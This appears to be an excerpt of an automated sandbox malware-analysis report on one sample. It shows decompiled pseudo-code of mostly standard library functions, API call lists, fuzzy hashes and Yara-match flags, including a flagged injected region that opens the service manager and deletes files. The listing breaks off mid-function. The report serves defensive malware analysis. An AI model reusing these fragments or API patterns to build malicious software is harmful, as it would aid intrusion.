                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ProcWindow$Call
                  • String ID:
                  • API String ID: 2316559721-0
                  • Opcode ID: 31c9da80100a9d816eb6298f82ff38ddf85138840a761073849e75ee9fde59f5
                  • Instruction ID: a59e30d0e50e3c6695c8649c18ee593f55ddf464080dc148df40e0021e8dadaa
                  • Opcode Fuzzy Hash: 31c9da80100a9d816eb6298f82ff38ddf85138840a761073849e75ee9fde59f5
                  • Instruction Fuzzy Hash: 8CF0F836100205FFDF115FA5DC48DAA7FB9FF08350B148529FA5996120E732D820AB44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00413276, Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E00413276(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t15;
				intOrPtr _t19;
				void* _t22;
				void* _t23;

				_push(0);
				E00431A9B(E0044B200, __ebx, __edi, __esi);
				_t22 = __ecx;
				_t25 =  *((intOrPtr*)(__ecx + 0x94));
				_t13 =  *((intOrPtr*)(_t23 + 8));
				 *((intOrPtr*)(__ecx + 0x88)) =  *((intOrPtr*)(_t23 + 8));
				if( *((intOrPtr*)(__ecx + 0x94)) == 0) {
					_t15 = E00404461(_t25, 0xb0); // executed
					_t19 = _t15;
					 *((intOrPtr*)(_t23 + 8)) = _t19;
					 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
					if(_t19 == 0) {
						_t13 = 0;
						__eflags = 0;
					} else {
						_t13 = E0042519C(_t19, _t22);
					}
					 *((intOrPtr*)(_t22 + 0x94)) = _t13;
				}
				if( *((intOrPtr*)(_t22 + 0x38)) == 0) {
					 *((intOrPtr*)(_t22 + 0x38)) = GetParent( *(_t22 + 0x20));
				}
				return E00431B73(_t13);
			}







                  0x00413276
                  0x0041327d
                  0x00413282
                  0x00413284
                  0x0041328b
                  0x0041328e
                  0x00413294
                  0x0041329b
                  0x004132a1
                  0x004132a3
                  0x004132a6
                  0x004132ac
                  0x004132b6
                  0x004132b6
                  0x004132ae
                  0x004132af
                  0x004132af
                  0x004132b8
                  0x004132b8
                  0x004132c2
                  0x004132cd
                  0x004132cd
                  0x004132d5

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041327D
                  • GetParent.USER32(?), ref: 004132C7
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3Parent_malloc
                  • String ID:
                  • API String ID: 4058389177-0
                  • Opcode ID: c689719606693e2765ef589d72a80aa2abebd4b93b4cbd792dbfe7422f500bb7
                  • Instruction ID: 5fd53afc60951b9d1215e33b10396915e24fbcf05b250d538ea7ccb8a05cbf96
                  • Opcode Fuzzy Hash: c689719606693e2765ef589d72a80aa2abebd4b93b4cbd792dbfe7422f500bb7
                  • Instruction Fuzzy Hash: 67F082305017149FEB60AF31C54579B76E0BF0431AF50847FE94A866A1DB7CA5848B4D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00407887, Relevance: 3.0, APIs: 2, Instructions: 19libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00407887(void* __ecx) {
				struct HINSTANCE__* _t11;
				signed int _t12;
				void* _t15;

				_t15 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_t11 = GetModuleHandleA( *(__ecx + 0xc)); // executed
					 *(_t15 + 4) = _t11;
					if(_t11 == 0) {
						_t12 = LoadLibraryA( *(_t15 + 0xc));
						 *(_t15 + 4) = _t12;
						 *((char*)(_t15 + 8)) = _t12 & 0xffffff00 | _t12 != 0x00000000;
					}
				}
				return  *(_t15 + 4);
			}






                  0x0040788a
                  0x00407890
                  0x00407895
                  0x0040789b
                  0x004078a0
                  0x004078a5
                  0x004078ad
                  0x004078b3
                  0x004078b3
                  0x004078a0
                  0x004078ba

                  APIs
                  • GetModuleHandleA.KERNELBASE(?,?,0040EC76,InitCommonControlsEx,00000000,?,0040F54A,00080000,00008000,?,?,00412253,?,00080000,?,?), ref: 00407895
                  • LoadLibraryA.KERNEL32(?,?,0040EC76,InitCommonControlsEx,00000000,?,0040F54A,00080000,00008000,?,?,00412253,?,00080000,?,?), ref: 004078A5
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: HandleLibraryLoadModule
                  • String ID:
                  • API String ID: 4133054770-0
                  • Opcode ID: 51c6b0a14c209bda3158205d76c13f49e01c4838667900211617a1ac94583d4c
                  • Instruction ID: b2e4a917816264131c583018976e3fb6b99e390f365dd9a40fef115991fd453c
                  • Opcode Fuzzy Hash: 51c6b0a14c209bda3158205d76c13f49e01c4838667900211617a1ac94583d4c
                  • Instruction Fuzzy Hash: A9E08C32901B01CFD7319F25E808A43BBE4BF04B20B10C83EE8AAD3A20E730E840CB10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004161F7, Relevance: 3.0, APIs: 2, Instructions: 15threadCOMMON
                  Download Yara Rule
                  C-Code - Quality: 86%
                  			E004161F7(void* __esi, void* __eflags) {
				void* _t3;
				void* _t4;
				struct HHOOK__* _t6;
				void* _t7;
				void* _t8;

				_t3 = E0041F363(_t7, _t8, __esi, __eflags);
				_t13 =  *((char*)(_t3 + 0x14));
				if( *((char*)(_t3 + 0x14)) == 0) {
					_push(__esi);
					_t4 = E0041EDAB(_t7, _t8, __esi, _t13);
					_t6 = SetWindowsHookExA(0xffffffff, E0041605F, 0, GetCurrentThreadId()); // executed
					 *(_t4 + 0x2c) = _t6;
					return _t6;
				}
				return _t3;
			}








                  0x004161f7
                  0x004161fc
                  0x00416200
                  0x00416202
                  0x00416203
                  0x0041621a
                  0x00416220
                  0x00000000
                  0x00416223
                  0x00416224

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CurrentHookThreadWindows
                  • String ID:
                  • API String ID: 1904029216-0
                  • Opcode ID: e16487a409085e34aeffa5215726b9f530c3ec48cf8e42557f90223b3f04fdec
                  • Instruction ID: 0d4e1b78ceb5744933d127dfd959b1211db20431d59c43cc5bd31d8bd1737379
                  • Opcode Fuzzy Hash: e16487a409085e34aeffa5215726b9f530c3ec48cf8e42557f90223b3f04fdec
                  • Instruction Fuzzy Hash: 88D0A7354043106ED7206B727C09B963F50BB86338F150A5EF921522D6C52C85C24F5D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023ECE90, Relevance: 3.0, APIs: 2, Instructions: 10serviceCOMMON
                  Download Yara Rule
                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,023ED662,00000102,023EAC19,?,023EAC8F), ref: 023ECE99
                  • CloseServiceHandle.ADVAPI32(00000000,?,023EAC8F), ref: 023ECEAE
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandleManagerOpenService
                  • String ID:
                  • API String ID: 1199824460-0
                  • Opcode ID: 2375b80f15f49602a1374a7cb7223444517120f5ff7a59dce11ed870a4b6905d
                  • Instruction ID: 2283bd941a45c29a6fa1f14cd82795979bd6ac9545b50d099729ea1e1e37dcea
                  • Opcode Fuzzy Hash: 2375b80f15f49602a1374a7cb7223444517120f5ff7a59dce11ed870a4b6905d
                  • Instruction Fuzzy Hash: 28C08CB0BC03009BEFE45B68BC09B253A6C7700F46F140800E709D50C6CBF04050D620
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023E14F2, Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,023EF000,023E1A84,?,?,?,?,?,?,?,023E10F5), ref: 023E14F5
                  • RtlAllocateHeap.NTDLL(00000000), ref: 023E14FC
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcess
                  • String ID:
                  • API String ID: 1357844191-0
                  • Opcode ID: 0e05aa74553666f438bcba058a761d354d4d5aa52c51087bb724ef5f20fc4973
                  • Instruction ID: 6751b85cb853eb1747d50180c2d3c0552d7bf3d7226242c54e5bee74ef9e8a70
                  • Opcode Fuzzy Hash: 0e05aa74553666f438bcba058a761d354d4d5aa52c51087bb724ef5f20fc4973
                  • Instruction Fuzzy Hash: 7DA002F5D901005BDD8857F8BE5DA19375CB744705F104944F3458604A9E7454148725
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004217B7, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                  Download Yara Rule
                  C-Code - Quality: 97%
                  			E004217B7(void* __ebx, intOrPtr* __ecx, void* __edi, signed int _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				struct tagRECT _v32;
				signed int _t74;
				signed char _t79;
				intOrPtr _t82;
				intOrPtr _t88;
				intOrPtr* _t91;
				intOrPtr _t92;
				signed int _t96;
				signed int _t97;
				intOrPtr _t101;
				intOrPtr _t104;
				intOrPtr _t109;
				signed int _t110;
				struct HDWP__** _t112;

				_t112 = _a8;
				_push(_t112);
				_v8 = __ecx;
				_t74 =  *((intOrPtr*)( *__ecx + 0x16c))();
				_a8 = _t74;
				if((_t74 & 0x10000000) == 0 || (_t74 & 0x0000f000) == 0) {
					L28:
					return 0;
				} else {
					CopyRect( &_v32, _t112 + 4);
					_t109 = _v32.right - _v32.left;
					_t88 = _v32.bottom - _v32.top;
					_t91 = _v8;
					_t79 =  *(_t91 + 0x84);
					_t96 = 0 |  *((intOrPtr*)(_t112 + 0x1c)) != 0x00000000;
					if((_t79 & 0x00000004) == 0 || (_t79 & 0x00000001) == 0) {
						if((_a8 & 0x0000a000) == 0) {
							_t97 = _t96 | 0x00000010;
						} else {
							_t97 = _t96 | 0x0000000a;
						}
					} else {
						_t97 = _t96 | 0x00000006;
					}
					 *((intOrPtr*)( *_t91 + 0x140))( &_v16, 0xffffffff, _t97);
					_t92 = _v16;
					if(_t92 >= _t109) {
						_t92 = _t109;
						_v16 = _t92;
					}
					_t82 = _v12;
					if(_t82 >= _t88) {
						_t82 = _t88;
						_v12 = _t82;
					}
					_t110 = _a8;
					if((_t110 & 0x0000a000) == 0) {
						if((_t110 & 0x00005000) != 0) {
							_t101 =  *((intOrPtr*)(_t112 + 0x18));
							 *((intOrPtr*)(_t112 + 0x14)) =  *((intOrPtr*)(_t112 + 0x14)) + _t92;
							if(_t101 <= _t82) {
								_t101 = _t82;
							}
							 *((intOrPtr*)(_t112 + 0x18)) = _t101;
							if((_t110 & 0x00001000) == 0) {
								if((_t110 & 0x00004000) != 0) {
									 *((intOrPtr*)(_t112 + 0xc)) =  *((intOrPtr*)(_t112 + 0xc)) - _t92;
									_v32.left = _v32.right - _t92;
								}
							} else {
								 *(_t112 + 4) =  *(_t112 + 4) + _t92;
							}
						}
					} else {
						_t104 =  *((intOrPtr*)(_t112 + 0x14));
						 *((intOrPtr*)(_t112 + 0x18)) =  *((intOrPtr*)(_t112 + 0x18)) + _t82;
						if(_t104 <= _t92) {
							_t104 = _t92;
						}
						 *((intOrPtr*)(_t112 + 0x14)) = _t104;
						if((_t110 & 0x00002000) == 0) {
							if((_t110 & 0x00008000) != 0) {
								 *((intOrPtr*)(_t112 + 0x10)) =  *((intOrPtr*)(_t112 + 0x10)) - _t82;
								_v32.top = _v32.bottom - _t82;
							}
						} else {
							 *((intOrPtr*)(_t112 + 8)) =  *((intOrPtr*)(_t112 + 8)) + _t82;
						}
					}
					_v32.right = _v32.left + _t92;
					_v32.bottom = _v32.top + _t82;
					if( *_t112 != 0) {
						E0040CEE2(_t112,  *((intOrPtr*)(_v8 + 0x20)),  &_v32);
					}
					goto L28;
				}
			}




















                  0x004217c2
                  0x004217c5
                  0x004217c6
                  0x004217c9
                  0x004217cf
                  0x004217d7
                  0x004218f4
                  0x004218f8
                  0x004217e8
                  0x004217f2
                  0x004217fe
                  0x00421801
                  0x00421804
                  0x00421807
                  0x00421812
                  0x00421817
                  0x00421829
                  0x00421830
                  0x0042182b
                  0x0042182b
                  0x0042182b
                  0x0042181d
                  0x0042181d
                  0x0042181d
                  0x0042183c
                  0x00421842
                  0x00421847
                  0x00421849
                  0x0042184b
                  0x0042184b
                  0x0042184e
                  0x00421853
                  0x00421855
                  0x00421857
                  0x00421857
                  0x0042185a
                  0x00421863
                  0x0042189c
                  0x0042189e
                  0x004218a1
                  0x004218a6
                  0x004218a8
                  0x004218a8
                  0x004218aa
                  0x004218b3
                  0x004218c0
                  0x004218c7
                  0x004218ca
                  0x004218ca
                  0x004218b5
                  0x004218b5
                  0x004218b5
                  0x004218b3
                  0x00421865
                  0x00421865
                  0x00421868
                  0x0042186d
                  0x0042186f
                  0x0042186f
                  0x00421871
                  0x0042187a
                  0x00421887
                  0x0042188e
                  0x00421891
                  0x00421891
                  0x0042187c
                  0x0042187c
                  0x0042187c
                  0x0042187a
                  0x004218db
                  0x004218de
                  0x004218e2
                  0x004218ef
                  0x004218ef
                  0x00000000
                  0x004218e2

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CopyRect
                  • String ID:
                  • API String ID: 1989077687-0
                  • Opcode ID: 6375a65d15a0f0f061cf90aeb32674f20a7cbe1805a7c2e37a1dc44e5b91dcc2
                  • Instruction ID: b6c8682c3a5f8d4b9bbb0fe91b9393bb500e1cc71d8d3095f72ca3a43206c229
                  • Opcode Fuzzy Hash: 6375a65d15a0f0f061cf90aeb32674f20a7cbe1805a7c2e37a1dc44e5b91dcc2
                  • Instruction Fuzzy Hash: 44419A31E003159FCB28DFA9D484AAFB7F6BF94300F64852ED41693364E738A945CB89
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041730A, Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E0041730A(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t38;
				signed int _t40;
				intOrPtr* _t49;
				signed int _t57;
				intOrPtr* _t84;
				void* _t85;

				_push(4);
				E00431A9B(E0044B513, __ebx, __edi, __esi);
				_t82 = __ecx;
				_t38 =  *((intOrPtr*)( *__ecx + 0x6c))();
				_t84 = _t38;
				_t87 = _t84;
				if(_t84 != 0) {
					 *(_t84 + 0x4c) =  *(_t84 + 0x4c) & 0x00000000;
					_push(0);
					_push(_t84);
					_t40 =  *((intOrPtr*)( *__ecx + 0x70))();
					 *(_t85 - 0x10) = _t40;
					__eflags = _t40;
					if(__eflags != 0) {
						__eflags =  *(_t85 + 8);
						if(__eflags != 0) {
							E0040D6DD(0, _t85 + 0xb, __ecx, __eflags);
							 *(_t85 - 4) = 0;
							__eflags =  *((intOrPtr*)( *_t84 + 0x74))( *(_t85 + 8));
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t84 + 0x54))( *(_t85 + 8), 1);
								_t29 = _t85 - 4;
								 *_t29 =  *(_t85 - 4) | 0xffffffff;
								__eflags =  *_t29;
								E004119E0(0, _t85 + 0xb, _t82, _t84,  *_t29);
								goto L14;
							} else {
								 *((intOrPtr*)( *( *(_t85 - 0x10)) + 0x60))();
								 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
								E004119E0(0, _t85 + 0xb, _t82, _t84, __eflags);
								goto L2;
							}
						} else {
							_push(_t84);
							 *((intOrPtr*)( *__ecx + 0x84))();
							__eflags =  *(_t85 + 0xc);
							if( *(_t85 + 0xc) == 0) {
								 *((intOrPtr*)(_t84 + 0x50)) = 1;
							}
							_t57 =  *((intOrPtr*)( *_t84 + 0x70))();
							__eflags = _t57;
							if(_t57 != 0) {
								 *((intOrPtr*)(_t82 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x8c)) + 1;
								L14:
								 *((intOrPtr*)( *_t82 + 0x74))( *(_t85 - 0x10), _t84,  *(_t85 + 0xc));
								_t49 = _t84;
							} else {
								 *((intOrPtr*)( *( *(_t85 - 0x10)) + 0x60))();
								goto L2;
							}
						}
					} else {
						E00417146(0, __edx, __ecx, _t84, __eflags);
						 *((intOrPtr*)( *_t84 + 4))(1, 0xf104, 0, 0xffffffff);
						goto L2;
					}
				} else {
					_push(0xffffffff);
					_push(_t38);
					_push(0xf104);
					E00417146(__ebx, __edx, __ecx, _t84, _t87);
					L2:
					_t49 = 0;
				}
				return E00431B73(_t49);
			}









                  0x0041730a
                  0x00417311
                  0x00417316
                  0x0041731a
                  0x0041731d
                  0x0041731f
                  0x00417321
                  0x0041733a
                  0x00417340
                  0x00417342
                  0x00417345
                  0x0041734d
                  0x00417350
                  0x00417352
                  0x0041736c
                  0x0041736f
                  0x004173a8
                  0x004173b4
                  0x004173ba
                  0x004173bc
                  0x004173e0
                  0x004173e3
                  0x004173e3
                  0x004173e3
                  0x004173ea
                  0x00000000
                  0x004173be
                  0x004173c3
                  0x004173c6
                  0x004173cd
                  0x00000000
                  0x004173cd
                  0x00417371
                  0x00417373
                  0x00417376
                  0x0041737c
                  0x0041737f
                  0x00417381
                  0x00417381
                  0x0041738c
                  0x0041738f
                  0x00417391
                  0x0041739d
                  0x004173ef
                  0x004173fa
                  0x004173fd
                  0x00417393
                  0x00417398
                  0x00000000
                  0x00417398
                  0x00417391
                  0x00417354
                  0x0041735c
                  0x00417367
                  0x00000000
                  0x00417367
                  0x00417323
                  0x00417323
                  0x00417325
                  0x00417326
                  0x0041732b
                  0x00417330
                  0x00417330
                  0x00417330
                  0x00417404

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00417311
                    • Part of subcall function 00417146: __EH_prolog3.LIBCMT ref: 0041714D
                    • Part of subcall function 004119E0: __EH_prolog3_catch_GS.LIBCMT ref: 004119EA
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$H_prolog3_catch_
                  • String ID:
                  • API String ID: 2899319929-0
                  • Opcode ID: d39df0fc78a5d45c1090d89ee54a143fec968a8c40ed11aa394c250920cd21a2
                  • Instruction ID: ffda74f464d4dc7f0a604a0d06fefe8caa514aab76a61e0630f1065df7d55a41
                  • Opcode Fuzzy Hash: d39df0fc78a5d45c1090d89ee54a143fec968a8c40ed11aa394c250920cd21a2
                  • Instruction Fuzzy Hash: 88316B30604219EFCB20AF64C885AAEB7B1BF04314F10455AFD628B3A1DB78D981DB49
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023ED013, Relevance: 1.6, APIs: 1, Instructions: 71fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 023ECEB5: lstrlenW.KERNEL32(00000000,?,00000000), ref: 023ECEC6
                  • DeleteFileW.KERNELBASE(?), ref: 023ED0DD
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteFilelstrlen
                  • String ID:
                  • API String ID: 2942981432-0
                  • Opcode ID: f9bfa0e03e4c142368f7f87ec3eff5aa6544902ac77affd2662a42878dae72a6
                  • Instruction ID: 08134cb82973ab01f8557869c7621de233ee336918df5291cbc84adb2638c092
                  • Opcode Fuzzy Hash: f9bfa0e03e4c142368f7f87ec3eff5aa6544902ac77affd2662a42878dae72a6
                  • Instruction Fuzzy Hash: 18118BB5A0012CDBCF20B665AC489EB726EDB84350F4405A6E64FD3281EE708D998AA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040F62D, Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E0040F62D(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t39;
				intOrPtr _t56;
				signed int _t58;
				signed int _t62;
				intOrPtr _t70;
				signed int _t76;
				void* _t78;
				void* _t82;
				intOrPtr _t83;

				_t82 = __eflags;
				_push(0x38);
				E00431ACE(E0044B025, __ebx, __edi, __esi);
				_t56 = E00420AEC(__ebx, 0x466508, __edi, __esi, _t82, 0x406452);
				_t83 = _t56;
				 *((intOrPtr*)(_t78 - 0x18)) = _t56;
				_t84 = _t83 == 0;
				if(_t83 == 0) {
					E00406436(_t56, 0x466508, __edi, __esi, _t84);
				}
				_t4 = _t56 + 0x58; // 0x58
				_t58 = 7;
				_t39 = memcpy(_t78 - 0x44, _t4, _t58 << 2);
				_t70 =  *((intOrPtr*)(_t78 + 0x10));
				_t76 =  *(_t78 + 8);
				 *_t39 =  *(_t78 + 0xc);
				 *((intOrPtr*)(_t56 + 0x60)) =  *((intOrPtr*)(_t78 + 0x14));
				 *((intOrPtr*)(_t56 + 0x5c)) = _t70;
				 *((intOrPtr*)(_t56 + 0x64)) =  *((intOrPtr*)(_t78 + 0x18));
				 *((intOrPtr*)(_t78 - 4)) = 0;
				if(_t70 == 2 &&  *((intOrPtr*)(_t76 + 0x4c)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x4c)))) + 0x60))(0);
				}
				 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
				if(_t70 == 0x110) {
					E0040D7C1(_t76, _t78 - 0x28, _t78 + 8);
				}
				 *((intOrPtr*)(_t78 + 0x18)) =  *((intOrPtr*)( *_t76 + 0x110))(_t70,  *((intOrPtr*)(_t78 + 0x14)),  *((intOrPtr*)(_t78 + 0x18)));
				if(_t70 == 0x110) {
					E0040F5B7(_t56, 0, _t76, _t78 - 0x28,  *(_t78 + 8));
				}
				_t30 = _t56 + 0x58; // 0x58
				_t62 = 7;
				return E00431B73(memcpy(_t30, _t78 - 0x44, _t62 << 2));
			}












                  0x0040f62d
                  0x0040f62d
                  0x0040f634
                  0x0040f648
                  0x0040f64e
                  0x0040f653
                  0x0040f656
                  0x0040f658
                  0x0040f65a
                  0x0040f65a
                  0x0040f65f
                  0x0040f666
                  0x0040f66a
                  0x0040f66f
                  0x0040f672
                  0x0040f675
                  0x0040f67a
                  0x0040f680
                  0x0040f683
                  0x0040f686
                  0x0040f68c
                  0x0040f699
                  0x0040f699
                  0x0040f69c
                  0x0040f6a6
                  0x0040f6b1
                  0x0040f6b1
                  0x0040f6c7
                  0x0040f6d0
                  0x0040f6da
                  0x0040f6da
                  0x0040f70f
                  0x0040f712
                  0x0040f71d

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 0040F634
                    • Part of subcall function 00420AEC: __EH_prolog3.LIBCMT ref: 00420AF3
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$Exception@8H_prolog3_catchThrow
                  • String ID:
                  • API String ID: 24280941-0
                  • Opcode ID: a5e4790e460b5be2e02f3c679bf46ce18870f2b1a8203689afa57875004627af
                  • Instruction ID: 55c1a81f4b8db02ad9ddc7eda2fdd22912c5a9ef6f5b427848955299c37591cb
                  • Opcode Fuzzy Hash: a5e4790e460b5be2e02f3c679bf46ce18870f2b1a8203689afa57875004627af
                  • Instruction Fuzzy Hash: 6B217A72A00209DFCF15DFA4C4819DE3BA6FF58310F11843AF905AB691C738A985CB99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004012B0, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                  Download Yara Rule
                  C-Code - Quality: 53%
                  			E004012B0(intOrPtr* __ecx, void* __edx) {
				void* __ebx;
				intOrPtr* _t14;
				void* _t16;
				signed int _t18;
				void* _t20;
				void* _t23;
				intOrPtr _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				void* _t38;
				void* _t39;
				void* _t41;
				intOrPtr _t42;
				intOrPtr* _t43;
				void* _t45;
				intOrPtr _t46;
				intOrPtr _t47;
				void* _t49;
				void* _t50;

				_t26 = __ecx;
				E00401090(__ecx, __edx, 0x8007000e);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t42 =  *_t26;
				_t24 =  *((intOrPtr*)(_t42 - 0xc));
				_t43 = _t42 - 0x10;
				 *((intOrPtr*)(_t49 + 0xc)) = _t26;
				_t14 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t43)) + 0x10))))(_t38, _t41, _t45, _t23, _t26);
				_t35 =  *_t14;
				_t46 =  *((intOrPtr*)(_t49 + 0x18));
				_t28 = _t14;
				_t16 =  *((intOrPtr*)( *((intOrPtr*)( *_t14))))(_t46, 1); // executed
				_t39 = _t16;
				if(_t39 == 0) {
					E004012B0(_t28, _t35);
				}
				if(_t24 < _t46) {
					_t46 = _t24;
				}
				_t5 = _t46 + 1; // 0x1
				_t7 = _t39 + 0x10; // 0x10
				_t47 = _t7;
				_t18 = E0043065F(_t24, _t43 + 0x10, _t47, _t5, _t43 + 0x10, _t5);
				_t50 = _t49 + 0x10;
				 *((intOrPtr*)(_t39 + 4)) = _t24;
				asm("lock xadd [edx], eax");
				_t20 = (_t18 | 0xffffffff) - 1;
				if(_t20 <= 0) {
					_t20 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t43)) + 4))))(_t43);
				}
				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x10)))) = _t47;
				return _t20;
			}






















                  0x004012b0
                  0x004012b5
                  0x004012ba
                  0x004012bb
                  0x004012bc
                  0x004012bd
                  0x004012be
                  0x004012bf
                  0x004012c4
                  0x004012c6
                  0x004012c9
                  0x004012cc
                  0x004012d8
                  0x004012da
                  0x004012dc
                  0x004012e2
                  0x004012e7
                  0x004012e9
                  0x004012ed
                  0x004012ef
                  0x004012ef
                  0x004012f6
                  0x004012f8
                  0x004012f8
                  0x004012fa
                  0x00401303
                  0x00401303
                  0x00401307
                  0x0040130c
                  0x0040130f
                  0x00401318
